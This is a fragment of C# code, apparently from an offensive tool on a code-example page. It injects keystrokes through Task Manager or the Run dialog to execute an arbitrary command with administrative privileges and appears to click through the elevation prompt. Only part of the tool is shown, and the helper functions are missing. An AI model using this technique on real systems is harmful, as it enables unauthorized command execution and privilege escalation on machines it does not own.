Thread.Sleep(500);
SendText("taskmgr");
Thread.Sleep(1000);
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
SendElement("Alt+F");
Thread.Sleep(1000);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
Thread.Sleep(500);
}
Console.WriteLine("[+] Executing {0}", cmd.ToLower());
SendText(cmd.ToLower());
Thread.Sleep(1000);
if (runtype == "taskmgr")
{
SendElement("Tab");
Thread.Sleep(500);
SendElement("Space");
Thread.Sleep(500);
}
if(runtype == "winr")
{
//Currently bugged - does not run elevated
SendElement("Ctrl+Shift+down");
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(250);
SendElement("Enter+up");
Thread.Sleep(500);
SendElement("Ctrl+Shift+up");
Thread.Sleep(500);
}
else
{
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
Thread.Sleep(250);
}
if (isdrive == true)
{
SendElement("Left");
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
}
if (runtype == "winr")
{
SendElement("Left");
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
}
if (runtype == "taskmgr")
{
Thread.Sleep(250);
SendElement("Alt+F4");
}
}
See More Examples